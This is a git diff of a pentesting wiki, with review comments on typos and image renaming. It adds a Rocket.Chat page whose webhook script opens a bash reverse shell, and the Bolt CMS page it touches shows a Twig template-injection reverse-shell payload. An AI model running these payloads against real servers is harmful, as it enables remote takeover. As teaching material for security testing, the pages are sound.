diff --git a/.gitbook/assets/image (1) (1) (2) (1).png b/.gitbook/assets/image (1) (1) (2) (1).png new file mode 100644 index 000000000..261b7c009 Binary files /dev/null and b/.gitbook/assets/image (1) (1) (2) (1).png differ diff --git a/.gitbook/assets/image (1) (1) (2).png b/.gitbook/assets/image (1) (1) (2).png index 261b7c009..ae902527d 100644 Binary files a/.gitbook/assets/image (1) (1) (2).png and b/.gitbook/assets/image (1) (1) (2).png differ diff --git a/.gitbook/assets/image (1) (1).png b/.gitbook/assets/image (1) (1).png index ae902527d..76ed9278a 100644 Binary files a/.gitbook/assets/image (1) (1).png and b/.gitbook/assets/image (1) (1).png differ diff --git a/.gitbook/assets/image (1).png b/.gitbook/assets/image (1).png index 76ed9278a..bbff6c5f4 100644 Binary files a/.gitbook/assets/image (1).png and b/.gitbook/assets/image (1).png differ diff --git a/.gitbook/assets/image (2) (2) (2) (1).png b/.gitbook/assets/image (2) (2) (2) (1).png new file mode 100644 index 000000000..64b0c5b0d Binary files /dev/null and b/.gitbook/assets/image (2) (2) (2) (1).png differ diff --git a/.gitbook/assets/image (2) (2) (2).png b/.gitbook/assets/image (2) (2) (2).png index 64b0c5b0d..8cbefda25 100644 Binary files a/.gitbook/assets/image (2) (2) (2).png and b/.gitbook/assets/image (2) (2) (2).png differ diff --git a/.gitbook/assets/image (2) (2).png b/.gitbook/assets/image (2) (2).png index 8cbefda25..37e88406f 100644 Binary files a/.gitbook/assets/image (2) (2).png and b/.gitbook/assets/image (2) (2).png differ diff --git a/.gitbook/assets/image (2).png b/.gitbook/assets/image (2).png index 37e88406f..163b502de 100644 Binary files a/.gitbook/assets/image (2).png and b/.gitbook/assets/image (2).png differ diff --git a/.gitbook/assets/image (3) (2) (1) (1).png b/.gitbook/assets/image (3) (2) (1) (1).png new file mode 100644 index 000000000..d6d915b35 Binary files /dev/null and b/.gitbook/assets/image (3) (2) (1) (1).png differ 
diff --git a/.gitbook/assets/image (3) (2) (1).png b/.gitbook/assets/image (3) (2) (1).png index d6d915b35..884a59fd2 100644 Binary files a/.gitbook/assets/image (3) (2) (1).png and b/.gitbook/assets/image (3) (2) (1).png differ diff --git a/.gitbook/assets/image (3) (2).png b/.gitbook/assets/image (3) (2).png index 884a59fd2..9a74fb3f3 100644 Binary files a/.gitbook/assets/image (3) (2).png and b/.gitbook/assets/image (3) (2).png differ diff --git a/.gitbook/assets/image (3).png b/.gitbook/assets/image (3).png index 9a74fb3f3..8a4bb9a4a 100644 Binary files a/.gitbook/assets/image (3).png and b/.gitbook/assets/image (3).png differ diff --git a/.gitbook/assets/image (4) (7).png b/.gitbook/assets/image (4) (7).png new file mode 100644 index 000000000..5fd0b4257 Binary files /dev/null and b/.gitbook/assets/image (4) (7).png differ diff --git a/.gitbook/assets/image (4).png b/.gitbook/assets/image (4).png index 5fd0b4257..fce3191e9 100644 Binary files a/.gitbook/assets/image (4).png and b/.gitbook/assets/image (4).png differ diff --git a/.gitbook/assets/image.png b/.gitbook/assets/image.png index 8a4bb9a4a..eb57ea914 100644 Binary files a/.gitbook/assets/image.png and b/.gitbook/assets/image.png differ diff --git a/SUMMARY.md b/SUMMARY.md index df2ee5c38..f2a2e2970 100644 --- a/SUMMARY.md +++ b/SUMMARY.md 
@@ -355,6 +355,7 @@ * [PHP - RCE abusing object creation: new $\_GET\["a"\]($\_GET\["b"\])](network-services-pentesting/pentesting-web/php-tricks-esp/php-rce-abusing-object-creation-new-usd\_get-a-usd\_get-b.md) * [PHP SSRF](network-services-pentesting/pentesting-web/php-tricks-esp/php-ssrf.md) * [Python](network-services-pentesting/pentesting-web/python.md) + * [Rocket Chat](network-services-pentesting/pentesting-web/rocket-chat.md) * [Special HTTP headers](network-services-pentesting/pentesting-web/special-http-headers.md) * [Spring Actuators](network-services-pentesting/pentesting-web/spring-actuators.md) * [Symfony](network-services-pentesting/pentesting-web/symphony.md) diff --git a/network-services-pentesting/pentesting-web/bolt-cms.md b/network-services-pentesting/pentesting-web/bolt-cms.md index b770ab97a..478944e6b 100644 --- a/network-services-pentesting/pentesting-web/bolt-cms.md +++ b/network-services-pentesting/pentesting-web/bolt-cms.md @@ -19,7 +19,7 @@ After login as admin (go to /bot lo access the login prompt), you can get RCE in * Select `Configuration` -> `View Configuration` -> `Main Configuration` or go the the URL path `/bolt/file-edit/config?file=/bolt/config.yaml` * Check the value of theme -
+
* Select `File management` -> `View & edit templates` * Select the theme base found in the previous (`base-2021` in this case) step and select `index.twig` @@ -27,7 +27,7 @@ After login as admin (go to /bot lo access the login prompt), you can get RCE in * Set your payload in this file via [template injection (Twig)](../../pentesting-web/ssti-server-side-template-injection/#twig-php), like: `{{['bash -c "bash -i >& /dev/tcp/10.10.14.14/4444 0>&1"']|filter('system')}}` * And save changes -
+
* Clear the cache in `Maintenance` -> `Clear the cache` * Access again the page as a regular user, and the payload should be executed diff --git a/network-services-pentesting/pentesting-web/rocket-chat.md b/network-services-pentesting/pentesting-web/rocket-chat.md new file mode 100644 index 000000000..b18745455 --- /dev/null +++ b/network-services-pentesting/pentesting-web/rocket-chat.md @@ -0,0 +1,57 @@ +# Rocket Chat + +
+ +HackTricks in 🐦 Twitter 🐦 - 🎙️ Twitch Wed - 18.30(UTC) 🎙️ - 🎥 Youtube 🎥 + +* Do you work in a **cybersecurity company**? Do you want to see your **company advertised in HackTricks**? or do you want to have access to the **latest version of the PEASS or download HackTricks in PDF**? Check the [**SUBSCRIPTION PLANS**](https://github.com/sponsors/carlospolop)! +* Discover [**The PEASS Family**](https://opensea.io/collection/the-peass-family), our collection of exclusive [**NFTs**](https://opensea.io/collection/the-peass-family) +* Get the [**official PEASS & HackTricks swag**](https://peass.creator-spring.com) +* **Join the** [**💬**](https://emojipedia.org/speech-balloon/) [**Discord group**](https://discord.gg/hRep4RUj7f) or the [**telegram group**](https://t.me/peass) or **follow** me on **Twitter** [**🐦**](https://github.com/carlospolop/hacktricks/tree/7af18b62b3bdc423e11444677a6a73d4043511e9/\[https:/emojipedia.org/bird/README.md)[**@carlospolopm**](https://twitter.com/carlospolopm)**.** +* **Share your hacking tricks by submitting PRs to the** [**hacktricks repo**](https://github.com/carlospolop/hacktricks) **and** [**hacktricks-cloud repo**](https://github.com/carlospolop/hacktricks-cloud). + +
+ +## RCE + +If you are admin inside Rocket Chat you can get RCE. + +* Got to **`Integrations`** and select **`New Integration`** and choose any: **`Incoming WebHook`** or **`Outgoing WebHook`**. + * `/admin/integrations/incoming` + +
+ +* According to the [docs](https://docs.rocket.chat/guides/administration/admin-panel/integrations), both use ES2015 / ECMAScript 6 ([basically JavaScript](https://codeburst.io/javascript-wtf-is-es6-es8-es-2017-ecmascript-dca859e4821c)) to process the data. So lets get a [rev shell for javascript](../../generic-methodologies-and-resources/shells/linux.md#nodejs) like: + +```javascript +const require = console.log.constructor('return process.mainModule.require')(); +const { exec } = require('child_process'); +exec("bash -c 'bash -i >& /dev/tcp/10.10.14.4/9001 0>&1'") +``` + +* Configure the WebHook (the channel and post as username must exists): + +
+ +* Configure WebHook script: + +
+ +* Save changes +* Get the generated WebHook URL: + +
+ +* Call it with curl and you shuold receive the rev shell + +
+ +HackTricks in 🐦 Twitter 🐦 - 🎙️ Twitch Wed - 18.30(UTC) 🎙️ - 🎥 Youtube 🎥 + +* Do you work in a **cybersecurity company**? Do you want to see your **company advertised in HackTricks**? or do you want to have access to the **latest version of the PEASS or download HackTricks in PDF**? Check the [**SUBSCRIPTION PLANS**](https://github.com/sponsors/carlospolop)! +* Discover [**The PEASS Family**](https://opensea.io/collection/the-peass-family), our collection of exclusive [**NFTs**](https://opensea.io/collection/the-peass-family) +* Get the [**official PEASS & HackTricks swag**](https://peass.creator-spring.com) +* **Join the** [**💬**](https://emojipedia.org/speech-balloon/) [**Discord group**](https://discord.gg/hRep4RUj7f) or the [**telegram group**](https://t.me/peass) or **follow** me on **Twitter** [**🐦**](https://github.com/carlospolop/hacktricks/tree/7af18b62b3bdc423e11444677a6a73d4043511e9/\[https:/emojipedia.org/bird/README.md)[**@carlospolopm**](https://twitter.com/carlospolopm)**.** +* **Share your hacking tricks by submitting PRs to the** [**hacktricks repo**](https://github.com/carlospolop/hacktricks) **and** [**hacktricks-cloud repo**](https://github.com/carlospolop/hacktricks-cloud). + +
diff --git a/pentesting-web/deserialization/jndi-java-naming-and-directory-interface-and-log4shell.md b/pentesting-web/deserialization/jndi-java-naming-and-directory-interface-and-log4shell.md index 81ee548b7..7c696a18f 100644 --- a/pentesting-web/deserialization/jndi-java-naming-and-directory-interface-and-log4shell.md +++ b/pentesting-web/deserialization/jndi-java-naming-and-directory-interface-and-log4shell.md @@ -2,13 +2,13 @@
-HackTricks in 🐦 Twitter 🐦 - 🎙️ Twitch Wed - 18.30(UTC) 🎙️ - 🎥 Youtube 🎥 +HackTricks in 🐦 Twitter 🐦 - 🎙️ Twitch Wed - 18.30(UTC) 🎙️ - 🎥 Youtube 🎥 * Do you work in a **cybersecurity company**? Do you want to see your **company advertised in HackTricks**? or do you want to have access to the **latest version of the PEASS or download HackTricks in PDF**? Check the [**SUBSCRIPTION PLANS**](https://github.com/sponsors/carlospolop)! * Discover [**The PEASS Family**](https://opensea.io/collection/the-peass-family), our collection of exclusive [**NFTs**](https://opensea.io/collection/the-peass-family) * Get the [**official PEASS & HackTricks swag**](https://peass.creator-spring.com) * **Join the** [**💬**](https://emojipedia.org/speech-balloon/) [**Discord group**](https://discord.gg/hRep4RUj7f) or the [**telegram group**](https://t.me/peass) or **follow** me on **Twitter** [**🐦**](https://github.com/carlospolop/hacktricks/tree/7af18b62b3bdc423e11444677a6a73d4043511e9/\[https:/emojipedia.org/bird/README.md)[**@carlospolopm**](https://twitter.com/carlospolopm)**.** -* **Share your hacking tricks by submitting PRs to the [hacktricks repo](https://github.com/carlospolop/hacktricks) and [hacktricks-cloud repo](https://github.com/carlospolop/hacktricks-cloud)**. +* **Share your hacking tricks by submitting PRs to the** [**hacktricks repo**](https://github.com/carlospolop/hacktricks) **and** [**hacktricks-cloud repo**](https://github.com/carlospolop/hacktricks-cloud).
@@ -422,7 +422,7 @@ In the CTF, you **couldn't access the stderr** of the java application using log Just to mention it, you could also inject new [**conversion patterns**](https://logging.apache.org/log4j/2.x/manual/layouts.html#PatternLayout) and trigger exceptions that will be logged to `stdout`. For example: -![](<../../.gitbook/assets/image (3) (2) (1).png>) +![](<../../.gitbook/assets/image (3) (2) (1) (1).png>) This wasn't found useful to exfiltrate date inside the error message, because the lookup wasn't solved before the conversion pattern, but it could be useful for other stuff such as detecting. @@ -482,12 +482,12 @@ In this [**writeup**](https://intrigus.org/research/2022/07/18/google-ctf-2022-l
-HackTricks in 🐦 Twitter 🐦 - 🎙️ Twitch Wed - 18.30(UTC) 🎙️ - 🎥 Youtube 🎥 +HackTricks in 🐦 Twitter 🐦 - 🎙️ Twitch Wed - 18.30(UTC) 🎙️ - 🎥 Youtube 🎥 * Do you work in a **cybersecurity company**? Do you want to see your **company advertised in HackTricks**? or do you want to have access to the **latest version of the PEASS or download HackTricks in PDF**? Check the [**SUBSCRIPTION PLANS**](https://github.com/sponsors/carlospolop)! * Discover [**The PEASS Family**](https://opensea.io/collection/the-peass-family), our collection of exclusive [**NFTs**](https://opensea.io/collection/the-peass-family) * Get the [**official PEASS & HackTricks swag**](https://peass.creator-spring.com) * **Join the** [**💬**](https://emojipedia.org/speech-balloon/) [**Discord group**](https://discord.gg/hRep4RUj7f) or the [**telegram group**](https://t.me/peass) or **follow** me on **Twitter** [**🐦**](https://github.com/carlospolop/hacktricks/tree/7af18b62b3bdc423e11444677a6a73d4043511e9/\[https:/emojipedia.org/bird/README.md)[**@carlospolopm**](https://twitter.com/carlospolopm)**.** -* **Share your hacking tricks by submitting PRs to the [hacktricks repo](https://github.com/carlospolop/hacktricks) and [hacktricks-cloud repo](https://github.com/carlospolop/hacktricks-cloud)**. +* **Share your hacking tricks by submitting PRs to the** [**hacktricks repo**](https://github.com/carlospolop/hacktricks) **and** [**hacktricks-cloud repo**](https://github.com/carlospolop/hacktricks-cloud).
diff --git a/pentesting-web/http-request-smuggling/browser-http-request-smuggling.md b/pentesting-web/http-request-smuggling/browser-http-request-smuggling.md index c9ee16db1..5921c5672 100644 --- a/pentesting-web/http-request-smuggling/browser-http-request-smuggling.md +++ b/pentesting-web/http-request-smuggling/browser-http-request-smuggling.md @@ -2,7 +2,7 @@
-HackTricks in 🐦 Twitter 🐦 - 🎙️ Twitch Wed - 18.30(UTC) 🎙️ - 🎥 Youtube 🎥 +HackTricks in 🐦 Twitter 🐦 - 🎙️ Twitch Wed - 18.30(UTC) 🎙️ - 🎥 Youtube 🎥 * Do you work in a **cybersecurity company**? Do you want to see your **company advertised in HackTricks**? or do you want to have access to the **latest version of the PEASS or download HackTricks in PDF**? Check the [**SUBSCRIPTION PLANS**](https://github.com/sponsors/carlospolop)! * Discover [**The PEASS Family**](https://opensea.io/collection/the-peass-family), our collection of exclusive [**NFTs**](https://opensea.io/collection/the-peass-family) @@ -281,7 +281,7 @@ In this case the attacker **won't receive the response timeout until he has send Amazon's Application Load Balancer (ALB) will **stream the data of the connection as needed**, but if it **receives** the **response** to the half request (the timeout) **before** receiving the **body**, it **won't send the body**, so a **Race Condition** must be exploited here: -
+
There's an additional complication when it comes to **exploiting Apache behind ALB** - **both servers** have a default **timeout of 60 seconds**. This leaves an **extremely small time-window** to send the second part of the request. The RC attack was ultimately successful after 66 hours. @@ -329,7 +329,7 @@ tc qdisc add dev eth0 parent 1:3 handle 10: netem delay 61s
-HackTricks in 🐦 Twitter 🐦 - 🎙️ Twitch Wed - 18.30(UTC) 🎙️ - 🎥 Youtube 🎥 +HackTricks in 🐦 Twitter 🐦 - 🎙️ Twitch Wed - 18.30(UTC) 🎙️ - 🎥 Youtube 🎥 * Do you work in a **cybersecurity company**? Do you want to see your **company advertised in HackTricks**? or do you want to have access to the **latest version of the PEASS or download HackTricks in PDF**? Check the [**SUBSCRIPTION PLANS**](https://github.com/sponsors/carlospolop)! * Discover [**The PEASS Family**](https://opensea.io/collection/the-peass-family), our collection of exclusive [**NFTs**](https://opensea.io/collection/the-peass-family) diff --git a/pentesting-web/phone-number-injections.md b/pentesting-web/phone-number-injections.md index c75ba2c66..b3707cc58 100644 --- a/pentesting-web/phone-number-injections.md +++ b/pentesting-web/phone-number-injections.md @@ -2,7 +2,7 @@
-HackTricks in 🐦 Twitter 🐦 - 🎙️ Twitch Wed - 18.30(UTC) 🎙️ - 🎥 Youtube 🎥 +HackTricks in 🐦 Twitter 🐦 - 🎙️ Twitch Wed - 18.30(UTC) 🎙️ - 🎥 Youtube 🎥 * Do you work in a **cybersecurity company**? Do you want to see your **company advertised in HackTricks**? or do you want to have access to the **latest version of the PEASS or download HackTricks in PDF**? Check the [**SUBSCRIPTION PLANS**](https://github.com/sponsors/carlospolop)! * Discover [**The PEASS Family**](https://opensea.io/collection/the-peass-family), our collection of exclusive [**NFTs**](https://opensea.io/collection/the-peass-family) @@ -12,7 +12,7 @@
-It's possible to **add strings at the end the phone number** that could be used to exploit common injections (XSS, SQLi, SSRF...) or even to bypass protections: +It's possible to **add strings at the end the phone number** that could be used to exploit common injections (XSS, SQLi, SSRF...) or even to bypass protections:
@@ -20,7 +20,7 @@ It's possible to **add strings at the end the phone number** that could be used **OTP Bypass / Bruteforce** would work like this: -
+
## References @@ -28,7 +28,7 @@ It's possible to **add strings at the end the phone number** that could be used
-HackTricks in 🐦 Twitter 🐦 - 🎙️ Twitch Wed - 18.30(UTC) 🎙️ - 🎥 Youtube 🎥 +HackTricks in 🐦 Twitter 🐦 - 🎙️ Twitch Wed - 18.30(UTC) 🎙️ - 🎥 Youtube 🎥 * Do you work in a **cybersecurity company**? Do you want to see your **company advertised in HackTricks**? or do you want to have access to the **latest version of the PEASS or download HackTricks in PDF**? Check the [**SUBSCRIPTION PLANS**](https://github.com/sponsors/carlospolop)! * Discover [**The PEASS Family**](https://opensea.io/collection/the-peass-family), our collection of exclusive [**NFTs**](https://opensea.io/collection/the-peass-family) diff --git a/pentesting-web/server-side-inclusion-edge-side-inclusion-injection.md b/pentesting-web/server-side-inclusion-edge-side-inclusion-injection.md index 198e7a9c0..e6d0f34af 100644 --- a/pentesting-web/server-side-inclusion-edge-side-inclusion-injection.md +++ b/pentesting-web/server-side-inclusion-edge-side-inclusion-injection.md @@ -2,7 +2,7 @@
-HackTricks in 🐦 Twitter 🐦 - 🎙️ Twitch Wed - 18.30(UTC) 🎙️ - 🎥 Youtube 🎥 +HackTricks in 🐦 Twitter 🐦 - 🎙️ Twitch Wed - 18.30(UTC) 🎙️ - 🎥 Youtube 🎥 * Do you work in a **cybersecurity company**? Do you want to see your **company advertised in HackTricks**? or do you want to have access to the **latest version of the PEASS or download HackTricks in PDF**? Check the [**SUBSCRIPTION PLANS**](https://github.com/sponsors/carlospolop)! * Discover [**The PEASS Family**](https://opensea.io/collection/the-peass-family), our collection of exclusive [**NFTs**](https://opensea.io/collection/the-peass-family) @@ -160,7 +160,7 @@ Use to bypass WAFs: ``` -
+
* Full account takeover by reflecting cookies @@ -260,7 +260,7 @@ Check the XSLT page:
-HackTricks in 🐦 Twitter 🐦 - 🎙️ Twitch Wed - 18.30(UTC) 🎙️ - 🎥 Youtube 🎥 +HackTricks in 🐦 Twitter 🐦 - 🎙️ Twitch Wed - 18.30(UTC) 🎙️ - 🎥 Youtube 🎥 * Do you work in a **cybersecurity company**? Do you want to see your **company advertised in HackTricks**? or do you want to have access to the **latest version of the PEASS or download HackTricks in PDF**? Check the [**SUBSCRIPTION PLANS**](https://github.com/sponsors/carlospolop)! * Discover [**The PEASS Family**](https://opensea.io/collection/the-peass-family), our collection of exclusive [**NFTs**](https://opensea.io/collection/the-peass-family) diff --git a/todo/radio-hacking/flipper-zero/fz-sub-ghz.md b/todo/radio-hacking/flipper-zero/fz-sub-ghz.md index 34513e944..710a8e766 100644 --- a/todo/radio-hacking/flipper-zero/fz-sub-ghz.md +++ b/todo/radio-hacking/flipper-zero/fz-sub-ghz.md @@ -2,7 +2,7 @@
-HackTricks in 🐦 Twitter 🐦 - 🎙️ Twitch Wed - 18.30(UTC) 🎙️ - 🎥 Youtube 🎥 +HackTricks in 🐦 Twitter 🐦 - 🎙️ Twitch Wed - 18.30(UTC) 🎙️ - 🎥 Youtube 🎥 * Do you work in a **cybersecurity company**? Do you want to see your **company advertised in HackTricks**? or do you want to have access to the **latest version of the PEASS or download HackTricks in PDF**? Check the [**SUBSCRIPTION PLANS**](https://github.com/sponsors/carlospolop)! * Discover [**The PEASS Family**](https://opensea.io/collection/the-peass-family), our collection of exclusive [**NFTs**](https://opensea.io/collection/the-peass-family) @@ -16,7 +16,7 @@ Flipper Zero can **receive and transmit radio frequencies in the range of 300-928 MHz** with its built-in module, which can read, save, and emulate remote controls. These controls are used for interaction with gates, barriers, radio locks, remote control switches, wireless doorbells, smart lights, and more. Flipper Zero can help you to learn if your security is compromised. -
+
## Sub-GHz hardware @@ -72,7 +72,7 @@ By default **Read Raw is also in 433.92 in AM650**, but if with the Read option ### Brute-Force -If you know the protocol used for example by the garage door it's possible to g**enerate all the codes and send them with the Flipper Zero.** This is an example that support general common types of garages: [**https://github.com/tobiabocchi/flipperzero-bruteforce**](https://github.com/tobiabocchi/flipperzero-bruteforce)**** +If you know the protocol used for example by the garage door it's possible to g**enerate all the codes and send them with the Flipper Zero.** This is an example that support general common types of garages: [**https://github.com/tobiabocchi/flipperzero-bruteforce**](https://github.com/tobiabocchi/flipperzero-bruteforce)\*\*\*\* ### Add Manually 
@@ -82,22 +82,22 @@ Add signals from a configured list of protocols #### List of [supported protocols](https://docs.flipperzero.one/sub-ghz/add-new-remote) -| Princeton\_433 (works with the majority of static code systems) | 433.92 | Static | -| ---------------------------------------------------------------- | ------ | ------- | -| Nice Flo 12bit\_433 | 433.92 | Static | -| Nice Flo 24bit\_433 | 433.92 | Static | -| CAME 12bit\_433 | 433.92 | Static | -| CAME 24bit\_433 | 433.92 | Static | -| Linear\_300 | 300.00 | Static | -| CAME TWEE | 433.92 | Static | -| Gate TX\_433 | 433.92 | Static | -| DoorHan\_315 | 315.00 | Dynamic | -| DoorHan\_433 | 433.92 | Dynamic | -| LiftMaster\_315 | 315.00 | Dynamic | -| LiftMaster\_390 | 390.00 | Dynamic | -| Security+2.0\_310 | 310.00 | Dynamic | -| Security+2.0\_315 | 315.00 | Dynamic | -| Security+2.0\_390 | 390.00 | Dynamic | +| Princeton\_433 (works with the majority of static code systems) | 433.92 | Static | +| --------------------------------------------------------------- | ------ | ------- | +| Nice Flo 12bit\_433 | 433.92 | Static | +| Nice Flo 24bit\_433 | 433.92 | Static | +| CAME 12bit\_433 | 433.92 | Static | +| CAME 24bit\_433 | 433.92 | Static | +| Linear\_300 | 300.00 | Static | +| CAME TWEE | 433.92 | Static | +| Gate TX\_433 | 433.92 | Static | +| DoorHan\_315 | 315.00 | Dynamic | +| DoorHan\_433 | 433.92 | Dynamic | +| LiftMaster\_315 | 315.00 | Dynamic | +| LiftMaster\_390 | 390.00 | Dynamic | +| Security+2.0\_310 | 310.00 | Dynamic | +| Security+2.0\_315 | 315.00 | Dynamic | +| Security+2.0\_390 | 390.00 | Dynamic | ### Supported Sub-GHz vendors @@ -120,7 +120,7 @@ Get dBms of the saved frequencies
-HackTricks in 🐦 Twitter 🐦 - 🎙️ Twitch Wed - 18.30(UTC) 🎙️ - 🎥 Youtube 🎥 +HackTricks in 🐦 Twitter 🐦 - 🎙️ Twitch Wed - 18.30(UTC) 🎙️ - 🎥 Youtube 🎥 * Do you work in a **cybersecurity company**? Do you want to see your **company advertised in HackTricks**? or do you want to have access to the **latest version of the PEASS or download HackTricks in PDF**? Check the [**SUBSCRIPTION PLANS**](https://github.com/sponsors/carlospolop)! * Discover [**The PEASS Family**](https://opensea.io/collection/the-peass-family), our collection of exclusive [**NFTs**](https://opensea.io/collection/the-peass-family) diff --git a/todo/radio-hacking/sub-ghz-rf.md b/todo/radio-hacking/sub-ghz-rf.md index dd6270c4f..cb2850e43 100644 --- a/todo/radio-hacking/sub-ghz-rf.md +++ b/todo/radio-hacking/sub-ghz-rf.md @@ -27,7 +27,7 @@ In Europe 433.92MHz is commonly used and in U.S. and Japan it's the 315MHz. If instead of sending each code 5 times (sent like this to make sure the receiver gets it) so just send it once, the time is reduced to 6mins: -
+
and if you **remove the 2 ms waiting** period between signals you can **reduce the time to 3minutes.** diff --git a/windows-hardening/active-directory-methodology/ad-certificates/domain-escalation.md b/windows-hardening/active-directory-methodology/ad-certificates/domain-escalation.md index 6586868b6..274e36952 100644 --- a/windows-hardening/active-directory-methodology/ad-certificates/domain-escalation.md +++ b/windows-hardening/active-directory-methodology/ad-certificates/domain-escalation.md @@ -413,7 +413,7 @@ Enterprise CAs also **store CES endpoints** in their AD object in the `msPKI-Enr certutil.exe -enrollmentServerURL -config CORPDC01.CORP.LOCAL\CORP-CORPDC01-CA ``` -
+
```powershell Import-Module PSPKI
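
Review bot: in the `.gitbook/assets` part of the patch, existing file names are given new contents (for example `image (3) (2) (1).png` goes from d6d915b35 to 884a59fd2, and `image.png` from 8a4bb9a4a to eb57ea914), yet the only reference update visible with its path is the one in the `@@ -422,7 +422,7 @@` hunk of `jndi-java-naming-and-directory-interface-and-log4shell.md`, which re-points to `image (3) (2) (1) (1).png`. Any other page that still embeds one of the shifted names will silently show a different screenshot. Please confirm every embed of these assets was re-pointed, or give the new Rocket Chat screenshots descriptive file names so the existing ones are not renumbered. The re-pointed image also keeps empty alt text (`![]`); a short description would help.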
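
Review bot: both hunks in `bolt-cms.md` change only the figure line and leave the typos in the surrounding steps untouched: "go to /bot lo access the login prompt" (should be "to access"; please also check whether `/bot` was meant to be `/bolt`, as in the `/bolt/file-edit/...` path a few lines later), "or go the the URL path", and "found in the previous (`base-2021` in this case) step", where "step" belongs before the parenthesis. Since the page is being touched anyway, fix these in the same commit.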
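
Review bot: the added steps in `rocket-chat.md` carry several typos that should be fixed before merge: "Got to" should be "Go to", "must exists" should be "must exist", "shuold" should be "should", and "So lets get" should be "So let's get". The page also states its precondition only as "If you are admin inside Rocket Chat" and names no version it was verified on. Adding the tested Rocket.Chat version and a closing line on hardening (limiting who may create integrations that carry scripts) would make the page usable for whoever has to remediate the finding.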
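
Review bot: the `@@ -12,7 +12,7 @@` hunk of `phone-number-injections.md` rewrites the sentence "add strings at the end the phone number" with no visible change to its wording, so the missing word is carried over. It should read "at the end of the phone number".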
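
Review bot: in the `### Brute-Force` hunk of `fz-sub-ghz.md`, the trailing `****` after the link is replaced with `\*\*\*\*`, which turns an empty bold pair into four literal asterisks rendered at the end of the sentence. Delete the marker instead of escaping it. Since the line is being rewritten, also move the misplaced bold in `g**enerate all the codes` to `**generate all the codes` and change "that support" to "that supports".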
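
Review bot: in the `@@ -82,22 +82,22 @@` hunk of `fz-sub-ghz.md` the table is only re-padded, so the `Princeton\_433` row still sits above the `| --- |` separator and renders as the column header. Add a real header row above it (for example protocol, frequency in MHz, and static or dynamic code type) so that Princeton is listed as a data row like the others.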